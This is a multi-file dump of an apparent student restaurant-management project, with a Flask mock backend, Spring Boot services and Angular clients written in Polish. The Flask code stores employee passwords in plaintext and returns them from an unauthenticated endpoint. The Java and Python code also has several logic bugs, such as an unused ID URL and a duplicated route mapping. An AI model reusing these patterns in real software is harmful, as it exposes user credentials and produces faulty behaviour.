is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n lista_dan = rrequest['lista_dan']\n\n if rrequest['kwota'] is 
None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n kwota = float(rrequest['kwota'])\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n global zamowienia_interator\n zamowienia_interator += 1\n lista_zamowien['lista_zamowien'].append({\n 'id_zamowienia': zamowienia_interator,\n 'lista_dan': lista_dan,\n 'id_restauracji': id_restauracji,\n 'id_klienta': id_klienta,\n 'kwota': kwota,\n 'status': 'oczekujące',\n 'data_zlozenia': str(datetime.datetime.today().strftime('%Y-%m-%d'))\n })\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Edytuj_zamowienie(id_zamowienia:int, lista[id_dania:int,nazwa:string],kwota:double)\[email protected]('/edytuj_zamowienie_Z', methods=['POST'])\ndef edytuj_zamowienie_Z():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_zamowienia\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n try:\n if rrequest[\"lista_dan\"]:\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == int(rrequest['id_zamowienia']):\n zamowienie['lista_dan'] = str(rrequest['lista_dan'])\n except KeyError:\n pass\n\n try:\n if rrequest[\"kwota\"]:\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == int(rrequest['id_zamowienia']):\n zamowienie['cena'] = int(rrequest['cena'])\n except KeyError:\n pass\n\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Zmien_status_zamowienia(id_zamowienia:int, status:string)\[email protected]('/zmien_status_zamowienia_Z', methods=['POST'])\ndef zmien_status_zamowienia_Z():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_zamowienia\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_zamowienia = 
int(rrequest['id_zamowienia'])\n if rrequest['status'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n status = str(rrequest['status'])\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == id_zamowienia:\n zamowienie['status'] = str(status)\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Pobierz zamówienia -> przekopiuj z realizacji\[email protected]('/pobierz_zamowienia_Z', methods=['GET'])\ndef pobierz_zamowienia_Z():\n try:\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(lista_zamowien)\n\n\n# Czy to ma sens? : Pobierz_zamowienie(id_zamowienia:int) zwraca (id_klienta:int, id_restauracji:int, lista[id_dania:int,nazwa:string],\n# kwota:double,data_zlozenia:string,status:string,ocena:int)\n\[email protected]('/pobierz_zamowienie_Z', methods=['GET'])\ndef pobierz_zamowienie_Z():\n try:\n if request.args.get(\"id_zamowienia\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_zamowienia = int(request.args.get(\"id_zamowienia\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(lista_zamowien['lista_zamowien'][id_zamowienia])\n\n\nlista_pracownikow = {\n 'lista_pracownikow': [\n {\n 'id_pracownika': 'janPan',\n 'id_restauracji': 1,\n 'imie': 'Jan',\n 'nazwisko': 'Nowak',\n 'telefon': '123456789',\n 'stanowisko': 'pracownik kuchni',\n 'haslo': 'soicrupogi'\n },\n {\n 'id_pracownika': 'AAmen',\n 'id_restauracji': 2,\n 'imie': 'Andrzej',\n 'nazwisko': 'Adrianowski',\n 'telefon': '777888999',\n 'stanowisko': 'dostawca',\n 'haslo': 
'39084utco'\n\n },\n {\n 'id_pracownika': 'KNow',\n 'id_restauracji': 4,\n 'imie': 'Kasia',\n 'nazwisko': 'Nowak',\n 'telefon': '333444555',\n 'stanowisko': 'menadzer restauracji',\n 'haslo': 'kKdPS'\n\n }\n ]\n}\n\n\[email protected]('/dodaj_pracownika', methods=['POST'])\ndef dodaj_pracownika():\n try:\n rrequest = request.get_json()\n if rrequest['id_pracownika'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_pracownika = rrequest['id_pracownika']\n\n if rrequest['id_restauracji'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(rrequest['id_restauracji'])\n\n if rrequest['imie'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n imie = str(rrequest['imie'])\n\n if rrequest['nazwisko'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n nazwisko = str(rrequest['nazwisko'])\n\n if rrequest['telefon'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n telefon = str(rrequest['telefon'])\n\n if rrequest['stanowisko'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n stanowisko = str(rrequest['stanowisko'])\n\n if rrequest['haslo'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n haslo = str(rrequest['haslo'])\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n lista_pracownikow['lista_pracownikow'].append({\n 'id_pracownika': id_pracownika,\n 'id_restauracji': id_restauracji,\n 'imie': imie,\n 'nazwisko': nazwisko,\n 'telefon': telefon,\n 'stanowisko': stanowisko,\n 'haslo': haslo\n })\n\n print(lista_pracownikow)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\[email protected]('/usun_pracownika', methods=['GET'])\ndef usun_pracownika():\n try:\n if request.args.get('id_pracownika') is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n 
return resp\n id_pracownika = request.args.get('id_pracownika')\n k = 0\n for pracownik in lista_pracownikow['lista_pracownikow']:\n if pracownik['id_pracownika'] == id_pracownika:\n lista_pracownikow['lista_pracownikow'].pop(k)\n k += 1\n\n print(lista_pracownikow)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\[email protected]('/pobierz_pracownikow', methods=['GET'])\ndef pobierz_pracownikow():\n try:\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n # nie ma jeszcze rozroznienia na pracownikow ze wzgledu na restauracje, przykro mi :(\n print(lista_pracownikow)\n return jsonify(lista_pracownikow)\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\nlista_restauracji = {\n 'lista_restauracji': [\n {\n 'nazwa': 'Cebuliowo',\n 'id_restauracji': 1,\n 'adres': 'Bitwy 17'\n },\n {\n 'nazwa': 'Pizza House',\n 'id_restauracji': 2,\n 'adres': 'Okopowa 2'\n },\n {\n 'nazwa': 'Students Dream',\n 'id_restauracji': 3,\n 'adres': 'Granadierow 5'\n }\n ]\n}\nrestauracje_iterator = 3\n\n\n# a) Dodaj_restauracje(nazwa:string,adres:string)\[email protected]('/dodaj_restauracje', methods=['POST'])\ndef dodaj_restauracje():\n try:\n rrequest = request.get_json()\n if rrequest['nazwa'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n nazwa = str(rrequest['nazwa'])\n\n if rrequest['adres'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n adres = str(rrequest['adres'])\n\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n global restauracje_iterator\n restauracje_iterator += 1\n lista_restauracji['lista_restauracji'].append({\n 'nazwa': nazwa,\n 'id_restauracji': restauracje_iterator,\n 
'adres': adres\n })\n print(lista_restauracji)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# b) Usuń_restauracje(id_restauracji:int)\[email protected]('/usun_restauracje', methods=['GET'])\ndef usun_restauracje():\n try:\n if request.args.get('id_restauracji') is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get('id_restauracji'))\n k = 0\n for restauracja in lista_restauracji['lista_restauracji']:\n if restauracja['id_restauracji'] == id_restauracji:\n lista_restauracji['lista_restauracji'].pop(k)\n k += 1\n\n print(lista_restauracji)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\n# c) Pobierz_restauracje() zwraca (lista[id_restauracji:int,nazwa:string,adres:string)\[email protected]('/pobierz_restauracje', methods=['GET'])\ndef pobierz_restauracje():\n return jsonify(lista_restauracji)\n\n\nif __name__ == '__main__':\n app.run()\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 43, "blob_id": "67703d7bafb51f04e63e21d18ffe9faf2118ce9a", "content_id": "bd696505a844f684a00487520cdeb8ed3a2f391f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 45, "license_type": "no_license", "max_line_length": 43, "num_lines": 1, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'zarzadzanie_personelem'\r\n" }, { "alpha_fraction": 0.498463898897171, "alphanum_fraction": 0.5038402676582336, "avg_line_length": 21.672727584838867, "blob_id": "ceef67391eab6beab6d2dbefebdba2194ba84e6a", "content_id": "f110ef543d88947d4fe7824f7d2c900b2de5cbec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", 
"length_bytes": 1302, "license_type": "no_license", "max_line_length": 84, "num_lines": 55, "path": "/zarzadzanie_siecia/src/main/java/zarzadzanie_siecia/Entity/RestaurantForm.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_siecia.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\n\r\npublic class RestaurantForm {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(RestaurantForm.class);\r\n \r\n private boolean valid;\r\n\r\n public boolean isValid() {\r\n return valid;\r\n }\r\n\r\n private String nazwa;\r\n private String adres;\r\n\r\n public static Logger getLog() {\r\n return log;\r\n }\r\n\r\n public String getNazwa() {\r\n return nazwa;\r\n }\r\n\r\n public String getAdres() {\r\n return adres;\r\n }\r\n\r\n public void validate(){\r\n \r\n if(!validateName()){\r\n valid = false;\r\n return;\r\n }\r\n valid = true;\r\n }\r\n \r\n private boolean validateName(){\r\n if(nazwa.length() > 30){\r\n log.info(\"String {} has more than 30 signs\", nazwa);\r\n return false; \r\n }\r\n if(!nazwa.matches(\"[\\\\w- ]+\")){\r\n log.info(\"Some signs of {} are illegal\", nazwa);\r\n return false; \r\n }\r\n if(!Character.isUpperCase(nazwa.codePointAt(0))){\r\n log.info(\"First letter of {} is not capitalized\", nazwa);\r\n return false; \r\n } \r\n return true;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5799372792243958, "alphanum_fraction": 0.5935214161872864, "avg_line_length": 27.90625, "blob_id": "1ee8c3061d19cd4283a8d38e3289327a23cc1e45", "content_id": "d33af2e920e688e425f4d22a2ae012f837215581", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 957, "license_type": "no_license", "max_line_length": 111, "num_lines": 32, "path": "/payment/src/app/services/data.service.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Injectable } from '@angular/core';\r\nimport 
{ Headers, RequestOptions, Response } from '@angular/http';\r\nimport { HttpClient } from '@angular/common/http';\r\nimport { Payment } from '../models/Payment';\r\nimport { Status } from '../models/Status';\r\n\r\n@Injectable()\r\nexport class DataService {\r\n\r\n constructor(public http: HttpClient) { }\r\n\r\n id: string;\r\n\r\n pay(payment: Payment) {\r\n payment.id_klienta = 1;\r\n payment.id_zamowienia = 1;\r\n payment.suma = 30;\r\n return this.http.post('http://localhost:9092/zaplac', payment).subscribe(res => this.processLink(res));\r\n }\r\n\r\n processLink(res) {\r\n window.open(res[\"redirectLink\"], \"_blank\")\r\n this.id = res[\"redirectLink\"].split(\"/\")[3];\r\n console.log(this.id);\r\n }\r\n\r\n \r\n getStatus() {\r\n return this.http.get(`http://localhost:9092/pobierz_status?id=${this.id}`)\r\n .subscribe(res => console.log(res));\r\n } \r\n}\r\n" }, { "alpha_fraction": 0.762135922908783, "alphanum_fraction": 0.8398058414459229, "avg_line_length": 39.20000076293945, "blob_id": "89fe44c89132468479128979800bbe555dd83acf", "content_id": "a68ef0b02f161a0a4ccfc6879e4cf150553e4027", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 206, "license_type": "no_license", "max_line_length": 61, "num_lines": 5, "path": "/baza_personel/baza_personel/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "server.port=9091\r\n\r\ncreateEmployeeAddress=http://localhost:5000/dodaj_pracownika\r\ngetEmployeesAddress=http://localhost:5000/pobierz_pracownikow\r\nremoveEmployeeAddress=http://localhost:5000/usun_pracownika\r\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 25.22222137451172, "blob_id": "9eff62354c23e125599b0edb7336f3772ceadefa", "content_id": "a95a548d24be11b6c7a96c96eac2416149168cf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"TypeScript", "length_bytes": 243, "license_type": "no_license", "max_line_length": 34, "num_lines": 9, "path": "/ui-menadzera-restauracji/src/app/models/Employee.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "export class Employee {\r\n public imie: string;\r\n public nazwisko: string;\r\n public id_restauracji: number;\r\n public stanowisko: string;\r\n public telefon: number;\r\n public id_pracownika: string;\r\n public haslo: string;\r\n }" }, { "alpha_fraction": 0.5452991724014282, "alphanum_fraction": 0.5547008514404297, "avg_line_length": 38.344825744628906, "blob_id": "f41c988a170353e0128f92bc5c4ea023928968d8", "content_id": "c5494e5e77d49ddbe09ddf82b4d3a3557050a5c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2342, "license_type": "no_license", "max_line_length": 114, "num_lines": 58, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/test/java/zarzadzanie_personelem/Entity/EmployeeOfferCreatorTest.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_personelem.Entity;\r\n\r\nimport com.google.gson.Gson;\r\nimport org.junit.Test;\r\nimport static org.junit.Assert.*;\r\nimport org.junit.runner.RunWith;import org.mockito.Mockito;\r\nimport org.powermock.api.mockito.PowerMockito;\r\nimport org.powermock.core.classloader.annotations.PrepareForTest;\r\nimport org.powermock.modules.junit4.PowerMockRunner;\r\n\r\n@RunWith(PowerMockRunner.class)\r\n@PrepareForTest(EmployeeOfferCreator.class)\r\npublic class EmployeeOfferCreatorTest {\r\n \r\n String invalidInput = new Gson().toJson(\"Nie udało się!\");\r\n \r\n @Test\r\n public void testCreateEmployeeOfferCorrect() throws Exception{\r\n String result;\r\n String employeeOfferFormJson;\r\n \r\n employeeOfferFormJson = \"{\\n\" +\r\n \" \\\"id_restauracji\\\": \\\"1\\\", \\n\" +\r\n \" \\\"etat\\\": \\\"40\\\",\\n\" +\r\n \" \\\"telefon\\\": \\\"123 
123 123\\\",\\n\" +\r\n \" \\\"stanowisko\\\": \\\"Kucharz\\\"\\n\"+\r\n \" } \";\r\n \r\n result =helperValidator(employeeOfferFormJson);\r\n assertNotEquals(result, invalidInput); \r\n } \r\n \r\n @Test\r\n public void testCreateEmployeeOfferIncorrect() throws Exception{\r\n String result;\r\n String employeeOfferFormJson;\r\n \r\n employeeOfferFormJson = \"{\\n\" +\r\n \" \\\"id_restauracji\\\": \\\"1\\\", \\n\" +\r\n \" \\\"etat\\\": \\\"40\\\",\\n\" +\r\n \" \\\"telefon\\\": \\\"123 123\\\",\\n\" +\r\n \" \\\"stanowisko\\\": \\\"Kucharz\\\"\\n\"+\r\n \" } \";\r\n \r\n result =helperValidator(employeeOfferFormJson);\r\n assertEquals(result, invalidInput); \r\n } \r\n \r\n private String helperValidator(String formJson) throws Exception{\r\n EmployeeOfferCreator employeeOfferCreator = new EmployeeOfferCreator();\r\n EmployeeOfferCreator employeeOfferCreatorSpy = PowerMockito.spy(employeeOfferCreator);\r\n \r\n PowerMockito.doReturn(\"Success\").when(employeeOfferCreatorSpy, \"saveEmployeeOfferToCache\", Mockito.any());\r\n String result = employeeOfferCreatorSpy.createEmployeeOffer(formJson, \"\");\r\n return result;\r\n }\r\n \r\n}\r\n" }, { "alpha_fraction": 0.6709677577018738, "alphanum_fraction": 0.6709677577018738, "avg_line_length": 24.16666603088379, "blob_id": "4f4b5c9521c7797d6448131647efd9891873db1a", "content_id": "e9ce2545ea3b6ccc4e8b4c84195738d9ff017de1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 157, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/payment/src/app/Models/Payment.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "export class Payment {\r\n public id_klienta: number;\r\n public id_zamowienia: number;\r\n public sposób_zapłaty: string;\r\n public suma: number; \r\n}" }, { "alpha_fraction": 0.6668869853019714, "alphanum_fraction": 0.6675479412078857, "avg_line_length": 37.298702239990234, "blob_id": 
"e9853324d1a400a2ad66f200304778940348f47c", "content_id": "fc7348ab5a34ba9d9959caae5c4a06674f3d5f56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3026, "license_type": "no_license", "max_line_length": 124, "num_lines": 77, "path": "/zarzadzanie_siecia/src/main/java/zarzadzanie_siecia/Entity/RestaurantCreator.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage zarzadzanie_siecia.Entity;\r\n\r\nimport com.google.gson.Gson;\r\nimport com.google.gson.reflect.TypeToken;\r\nimport java.util.HashMap;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.web.client.RestTemplate;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic class RestaurantCreator {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(RestaurantCreator.class);\r\n\r\n public String createRestaurant(final String restaurantFormJson, final String url) {\r\n RestaurantForm restaurantForm = (new Gson()).fromJson(restaurantFormJson, RestaurantForm.class);\r\n restaurantForm.validate();\r\n if(restaurantForm.isValid()){\r\n return saveRestaurantToDB(restaurantForm, url);\r\n }else{\r\n return (new Gson()).toJson(\"Invalid input\");\r\n }\r\n }\r\n \r\n private String saveRestaurantToDB(final RestaurantForm restaurantForm, final String url){\r\n RestTemplate restTemplate = new RestTemplate();\r\n String responseDB = restTemplate.postForObject(url, restaurantForm, String.class);\r\n \r\n HashMap<String, String> responseUser = new HashMap();\r\n responseUser.put(\"message\", responseDB);\r\n return (new Gson()).toJson(responseUser);\r\n } \r\n\r\n public String getRestaurant(String url) {\r\n RestTemplate restTemplate = new RestTemplate();\r\n String 
responseDB = restTemplate.getForObject(url, String.class);\r\n \r\n HashMap<String, String> responseUser = new HashMap();\r\n responseUser.put(\"message\", responseDB);\r\n return (new Gson()).toJson(responseUser); \r\n }\r\n\r\n public String assignManager(String assignManagerForm, String url) {\r\n RestTemplate restTemplate = new RestTemplate();\r\n String responseDB = restTemplate.postForObject(url, assignManagerForm, String.class);\r\n \r\n HashMap<String, String> responseUser = new HashMap();\r\n responseUser.put(\"message\", responseDB);\r\n return (new Gson()).toJson(responseUser);\r\n }\r\n\r\n public String removeRestaurant(String restaurantIdForm, String url) {\r\n String id_restauracji = getId_restauracji(restaurantIdForm);\r\n String urlWithId = url+\"?id_restauracji=\"+id_restauracji;\r\n \r\n RestTemplate restTemplate = new RestTemplate();\r\n String responseDB = restTemplate.getForObject(url, String.class);\r\n \r\n HashMap<String, String> responseUser = new HashMap();\r\n responseUser.put(\"message\", responseDB);\r\n return (new Gson()).toJson(responseUser);\r\n }\r\n \r\n private String getId_restauracji(String json){\r\n HashMap<String, String> jsonMapped = new Gson().fromJson(json, new TypeToken<HashMap<String,String>>(){}.getType());\r\n return jsonMapped.get(\"id_restauracji\");\r\n }\r\n \r\n}\r\n" }, { "alpha_fraction": 0.5864315032958984, "alphanum_fraction": 0.5869742035865784, "avg_line_length": 30.04347801208496, "blob_id": "31a004f9d48a25c0d53a233d328caa82ffe7878d", "content_id": "0eda3c2f9191dac7c28657cc6e8d4a6d54493165", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3685, "license_type": "no_license", "max_line_length": 88, "num_lines": 115, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/main/java/zarzadzanie_personelem/Controller/EmployeeController.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package 
zarzadzanie_personelem.Controller;\r\n\r\nimport zarzadzanie_personelem.Entity.EmployeeCreator;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.beans.factory.annotation.Autowired;\r\nimport org.springframework.core.env.Environment;\r\nimport org.springframework.web.bind.annotation.CrossOrigin;\r\nimport org.springframework.web.bind.annotation.GetMapping;\r\nimport org.springframework.web.bind.annotation.RestController;\r\nimport org.springframework.web.bind.annotation.PostMapping;\r\nimport org.springframework.web.bind.annotation.RequestBody;\r\nimport org.springframework.web.bind.annotation.RequestParam;\r\nimport zarzadzanie_personelem.Entity.EmployeeOfferCreator;\r\n\r\n@RestController\r\npublic class EmployeeController {\r\n \r\n @Autowired\r\n private Environment env;\r\n \r\n private static final Logger log = LoggerFactory.getLogger(EmployeeController.class);\r\n \r\n @CrossOrigin\r\n @PostMapping(\"/dodaj_pracownika\")\r\n public String addEmployee(\r\n @RequestBody String employeeForm) \r\n {\r\n try{\r\n log.info(\"Adding employee {}\", employeeForm);\r\n return (new EmployeeCreator()).createEmployee(\r\n employeeForm, \r\n env.getProperty(\"createEmployeeAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @GetMapping(\"/pobierz_pracownikow\")\r\n public String getEmployees() \r\n {\r\n try{\r\n log.info(\"Fetching employees\");\r\n return (new EmployeeCreator()).getEmployees(\r\n env.getProperty(\"getEmployeesAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @GetMapping(\"/pobierz_pracownikow\")\r\n public String getEmployeesOfRestaurant(\r\n @RequestParam(\"id_restauracji\") String id_restauracji) \r\n {\r\n try{\r\n log.info(\"Fetching employees\");\r\n return (new EmployeeCreator()).getEmployees(\r\n id_restauracji,\r\n env.getProperty(\"getEmployeesAddress\")\r\n );\r\n }catch(Exception e){\r\n 
return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @GetMapping(\"/usun_pracownika\")\r\n public String removeEmployee(\r\n @RequestParam(\"id_pracownika\") String id_pracownika) \r\n {\r\n try{\r\n log.info(\"Removing employee {}\", id_pracownika);\r\n return (new EmployeeCreator()).removeEmployee(\r\n id_pracownika,\r\n env.getProperty(\"removeEmployeeAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @PostMapping(\"/dodaj_ogloszenie\")\r\n public String addOffer(\r\n @RequestBody String employeeOfferForm) \r\n {\r\n try{\r\n log.info(\"Adding employee offer {}\", employeeOfferForm);\r\n return (new EmployeeOfferCreator()).createEmployeeOffer(\r\n employeeOfferForm, \r\n env.getProperty(\"createEmployeeOfferAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n } \r\n \r\n @CrossOrigin\r\n @GetMapping(\"/pobierz_ogloszenia\")\r\n public String getOffers() \r\n {\r\n try{\r\n log.info(\"Fetching employee offers\");\r\n return (new EmployeeOfferCreator()).getEmployeeOffers(\r\n env.getProperty(\"getEmployeeOffersAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6016713380813599, "alphanum_fraction": 0.6016713380813599, "avg_line_length": 19, "blob_id": "b915010b2e4b6b9a44e15708fd60617223dca561", "content_id": "cae779f6298eb37b9e461c57b4b40b03a4074aa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 359, "license_type": "no_license", "max_line_length": 65, "num_lines": 17, "path": "/platnosci/platnosci/src/main/java/utils/EasyCache.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "\r\npackage utils;\r\n\r\nimport java.util.HashMap;\r\n\r\npublic class EasyCache {\r\n \r\n private static HashMap<String, String> cache = new HashMap();\r\n \r\n public static void addElement(String key, String value){\r\n cache.put(key, 
value);\r\n }\r\n \r\n public static String getElement(String key){\r\n return cache.get(key);\r\n }\r\n \r\n}\r\n" }, { "alpha_fraction": 0.6360543966293335, "alphanum_fraction": 0.6360543966293335, "avg_line_length": 25.34883689880371, "blob_id": "f153194d357ce05779896b46873e7e84c331c981", "content_id": "8d1220339ec378c5afb19ef7f692e3ed5d3749c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1176, "license_type": "no_license", "max_line_length": 73, "num_lines": 43, "path": "/ui-menadzera-sieci/src/app/components/add-recruitment/add-recruitment.component.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\r\nimport { Recruitment } from '../../models/Recruitment';\r\nimport { DataService } from '../../services/data.service';\r\n\r\n@Component({\r\n selector: 'app-add-recruitment',\r\n templateUrl: './add-recruitment.component.html',\r\n styleUrls: ['./add-recruitment.component.css']\r\n})\r\nexport class AddRecruitmentComponent implements OnInit {\r\n\r\n recruitment: Recruitment = new Recruitment();\r\n recruitmentNew: Recruitment = new Recruitment();\r\n alertString: string = \"\";\r\n\r\n constructor(public dataService: DataService) {\r\n\r\n }\r\n\r\n ngOnInit() {\r\n this.dataService.getRecruitmentsList().subscribe(recruitment => {\r\n this.recruitment = recruitment;\r\n });\r\n }\r\n\r\n onSubmit() {\r\n this.dataService.addRecruitment(this.recruitmentNew)\r\n .subscribe(res => {\r\n var getValueArray = Object.values(res)\r\n this.alertString += getValueArray;\r\n alert(this.alertString.split(',').join(\"\"));\r\n this.alertString = \"\";\r\n this.dataService.getRecruitmentsList().subscribe(recruitment => {\r\n this.recruitment = recruitment;\r\n });\r\n });\r\n }\r\n\r\n onCancel() {\r\n\r\n }\r\n\r\n}\r\n" }, { "alpha_fraction": 0.6514124274253845, "alphanum_fraction": 0.6519774198532104, "avg_line_length": 
36.064517974853516, "blob_id": "dcf49ee91a0a58776ec6fabf8c675c04e377359e", "content_id": "1fc055f9bdacfe336475fe2e6a8c336f5d269c37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3554, "license_type": "no_license", "max_line_length": 108, "num_lines": 93, "path": "/baza_zarzadzanie_siecia/src/main/java/baza_zarzadzanie_siecia/Entity/SQLConnector.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage baza_zarzadzanie_siecia.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.http.HttpEntity;\r\nimport org.springframework.http.HttpHeaders;\r\nimport org.springframework.http.HttpMethod;\r\nimport org.springframework.http.HttpStatus;\r\nimport org.springframework.http.MediaType;\r\nimport org.springframework.http.ResponseEntity;\r\nimport org.springframework.web.client.RestTemplate;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic class SQLConnector implements Connector {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(SQLConnector.class);\r\n\r\n @Override\r\n public String createRestaurant(final String restaurantFormJson, final String url){ \r\n \r\n log.info(\"Sending {} to {}\", restaurantFormJson, url);\r\n RestTemplate restTemplate = new RestTemplate();\r\n HttpHeaders headers = new HttpHeaders();\r\n headers.setContentType(MediaType.APPLICATION_JSON);\r\n\r\n HttpEntity<String> entity = new HttpEntity<String>(restaurantFormJson, headers);\r\n ResponseEntity<String> response = restTemplate.exchange(url, HttpMethod.POST, entity, String.class);\r\n if(response.getStatusCode() == HttpStatus.OK){\r\n return \"Udało się!\";\r\n }else{\r\n return \"Nie udało się!\"; \r\n }\r\n }\r\n\r\n 
